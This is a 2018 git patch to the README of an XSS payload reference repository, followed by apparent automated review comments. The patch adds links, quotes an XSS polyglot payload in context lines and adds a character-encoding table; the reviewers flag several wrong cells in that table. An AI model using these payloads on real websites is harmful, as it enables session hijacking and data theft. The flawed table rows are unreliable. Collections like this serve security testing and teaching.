From fb19c953cb15a429e1afb3cda1cd4b89f996407a Mon Sep 17 00:00:00 2001 From: Somdev Sangwan Date: Thu, 8 Nov 2018 19:43:25 +0530 Subject: [PATCH] + Awesome XSS mind map, + Awesome Encoding --- README.md | 39 ++++++++++++++++++++++++++++++++++++++- 1 file changed, 38 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index dd21d31..5c35b41 100644 --- a/README.md +++ b/README.md @@ -27,6 +27,9 @@ Put this repo on watch. I will be updating it regularly. - [BeEF](https://github.com/beefproject/beef) - [JShell](https://github.com/UltimateHackers/JShell) +### Awesome XSS Mind Maps +A beutiful XSS mind map by Jack Masa, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/jackmasa-mind-map.png) + ### Awesome Payloads ``` z @@ -57,6 +60,8 @@ Here's an XSS polyglot that I made which can break out of 20+ contexts: %0ajavascript:`/*\"/*--><svg onload='/*` ``` +Explanation of how it works, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/polyglot.png) + ### Awesome Tags & Event Handlers - [105 Event Handlers with description](https://github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md) - [200 Event Handlers without description](http://pastebin.com/raw/WwcBmz5J) 
@@ -260,7 +265,39 @@ If the your dummy tags lands in the source code as it is, go for any of these pa ``` ### Awesome Encoding -Come back later + +|HTML|Char|Numeric|Description|Hex|CSS (ISO)|JS (Octal)| +|----|----|-------|-----------|----|--------|----------| +|`"`|"|`"`|quotation mark|u+0022|\0022|\42| +|`#`|#|`#`|number sign|u+0023|\0023|\43| +|`$`|$|`$`|dollar sign|u+0024|\0024|\44| +|`%`|%|`%`|percent sign|u+0025|\0025|\45| +|`&`|`&|`&`|ampersand|u+0026|\0026|\46| +|`'`|'|`'`|apostrophe|u+0027|\0027|\47| +|`(`|(|`(`|left parenthesis|u+0028|\0028|\50| +|`)`|)|`)`|right parenthesis|u+0029|\0029|\51| +|`*`|*|`*`|asterisk|u+002A|\002a|\52| +|`+`|+|`+`|plus sign|u+002B|\002b|\53| +|`,`|,|`,`|comma|u+002C|\002c|\54| +|`−`|-|`-`|hyphen-minus|u+002D|\002d|\55| +|`.`|.|`.`|full stop; period|u+002E|\002e|\56| +|`/`|/|`/`|solidus; slash|u+002F|\002f|\57| +|`:`|:|`:`|colon|u+003A|\003a|\72| +|`;`|;`|`;`|semicolon|u+003B|\003b|\73| +|`<`|<|`<`|less-than|u+003C|\003c|\74| +|`=`|=|`=`|equals|u+003D|\003d|\75| +|`>`|>|`>`|greater-than sign|u+003E|\003e|\76| +|`?`|?|`?`|question mark|u+003F|\003f|\77| +|`@`|@|`@`|at sign; commercial at|u+0040|\0040|\100| +|`[`|\[|`[`|left square bracket|u+005B|\005b|\133| +|`\`|/\|`\`|backslash|u+005C|\005c|\134| +|`]`|]|`]`|right square bracket|u+005D|\005d|\135| +|`^`|^|`^`|circumflex accent|u+005E|\005e|\136 +|`_`|_|`_`|low line|u+005F|\005f|\137| +|```|\`|```|grave accent|u+0060|\0060|\u0060| +|`{`|{|`{`|left curly bracket|u+007b|\007b|\173| +|`|`|\||`|`|vertical bar|u+007c|\007c|\174| +|`}`|}|`}`|right curly bracket|u+007d|\007d|\175| ### Awesome Tips & Tricks - `http(s)://` can be shortened to `//` or `/\\` or `\\`.
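Review bot: in the first hunk of this patch (the new "Awesome XSS Mind Maps" heading), "beutiful" should be "beautiful", and the link points at `s0md3v/AwesomeXSS` while the rest of the README (for example the `event-handlers.md` link in the next hunk's context) still uses `UltimateHackers/AwesomeXSS`; pick one repository path for the whole file so the links do not break if only one of the two names keeps serving the repo. Since the target is a PNG, consider rendering it inline with `![XSS mind map by Jack Masa](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/jackmasa-mind-map.png)` instead of a bare "here" link, so readers see the diagram without leaving the page.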
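Review bot: the polyglot hunk adds `Explanation of how it works, [here](.../Database/polyglot.png)` with a non-descriptive "here" as link text and the same `s0md3v` path inconsistency as above; prefer link text that says what the reader gets (for example "annotated breakdown of each context the polyglot escapes") or embed the image inline, and note in the sentence that the explanation is an image, since `polyglot.png` is not searchable text and the payload itself (`%0ajavascript:`/*\"/*--><svg onload='/*`` and the rest) is hard to follow without it.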
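Review bot: several rows of the new encoding table carry wrong cell contents, which matters because people copy these values straight into payloads. The Char cell for ampersand reads `` `& `` and the one for semicolon reads `` ;` ``, both with a stray backtick; the backslash row gives `/\` as the character instead of `\`; the grave accent row puts `\u0060` in the "JS (Octal)" column, where the octal escape is `\140`; the hyphen-minus row's HTML column shows `−` (U+2212, the minus sign) rather than `-` (U+002D), so the entity used there does not decode to the character the row describes; the circumflex row is missing its closing `|`; and the grave accent row's ``` ``` ``` cells will not render as an inline code span containing a backtick. The "Hex" column actually holds Unicode code points (`u+0022`), so label it "Unicode" or "Code point" to avoid confusion with the JS `\x22` form. Since the polyglot earlier in this same patch depends on URL encoding (`%0a`), a URL-encoded column (`%22`, `%3C`, and so on) would make the table usable for the payloads this README already ships; the existing "Come back later" placeholder being replaced is fine to drop.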